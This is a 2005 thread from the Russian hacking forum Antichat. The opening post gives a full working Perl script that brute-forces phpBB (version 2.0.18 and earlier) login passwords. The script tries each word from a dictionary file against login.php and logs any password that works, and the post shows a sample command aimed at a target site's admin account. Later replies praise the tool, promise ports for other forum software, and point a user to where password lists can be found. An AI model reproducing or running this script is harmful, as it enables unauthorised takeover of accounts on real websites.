Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)
-   -   phpBB <=2.0.18 "Login Dictionnary Attack" (https://forum.antichat.xyz/showthread.php?t=11983)

néM3S!s 21.12.2005 13:18
phpBB <=2.0.18 "Login Dictionnary Attack"
 
phpBB <=2.0.18 "Login Dictionnary Attack"
--> Brute force login.php with dictionnary

This exploit is Coded by my friend DarkFig.. enjOY antichat ;)

Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

C:\:brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt

Код:
#!/usr/bin/perl
############################################
#--------------------------Hack Private Version property-------------------------
#Credits:                        Weakness and Xploit by DarkFig
#Affected products:    All PhpBB versions <= 2.0.18
#Type:                            Dictionnary attack
#Solutions:                    None official , but many solutions are possible ;)
#Note:                          Not yet revealed | If a line of the dictionnary file contain no data => "End of the password file"
#For:                            Hack Private Version     
#------------------------------------------------------------------------------------------------
############################################
use IO::Socket;

#--------------Utilisation--------------#
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+
+-----------------------By DarkFig for Hack Private Version-----------------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    +
+---------------------------------------------------------------------------------+
+ <host>        => The host where PhpBB is installed        |  [Ex: site.com]    +
+ <path>        => Path of the PhpBB board                  |  [Ex: /forum/]    +
+ <port>        => PhpBB board port                        |  [Default is 80]  +
+ <pass_file>  => File containing words (dictionnary file) |  [Ex: dico.txt]    +
+ <username>    => Username you want to bruteforce          |  [Ex: MasterLamer] +
+ <file_result> => File you want to log activity            |  [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}

#--------------Data--------------#
$host      = $ARGV[0];
$path      = $ARGV[1];
$full      = "$host"."$path";
$port      = $ARGV[2];
$pass_file  = $ARGV[3];
$username  = $ARGV[4];
$fileresult = $ARGV[5];
$OK        = 0;
$referer    = "http://"."$host"."$path"."login.php?redirect=";
$postit    = "$path"."login.php";

#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
      [+] Username            | $username
      [+] Dictionnary file    | $pass_file
      [+] Attack log          | $fileresult
+---------------------------------------------------------+";

#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz  = "$passdico[$nligne]";
$request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length    = length $request;
if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}

#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
close($send);

#-------------Success--------------------------------------------#
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
      [-] Trying the password "."$passwordz
      [+] User:    $username
      [+] Password: $passwordz
+---------------------------------------------------------+\n";
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
    [+] PhpBB board              | $full
  [+] Board's port              | $port
  [+] Username                  | $username
  [+] Dictionnary file          | $pass_file
    [+] Number of test            | $nligne
    [+] Password found            | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}

#-------------Failed--------------------------------------------#
if ($OK == 0) {print "\n      [-] Trying the password "."$passwordz";$nligne++;}}
Made in France ! :D

néM3S!s 21.12.2005 13:45
Vidйo : here

GreenBear 21.12.2005 15:12
big tnx
nice ;)

x-ultra-x 21.12.2005 18:36
well done man, good job!

max_pain89 21.12.2005 22:50
good... ;) France is friend

néM3S!s 21.12.2005 23:35
ipb, punbb versions coming soon ;)

Powaaaaaaaa my friends !

NeMiNeM 22.12.2005 01:29
The speed is not very high, but IT WORKS=) 10x
+!

roruda_semu 23.12.2005 14:55
Good job Nemesis , thanks

Гаврила 28.12.2005 12:10
Excuse me,where can I get a Dictionnary?

Otaku 28.12.2005 17:27
www.yandex.ru
www.google.com
antichat=>search


Время: 08:13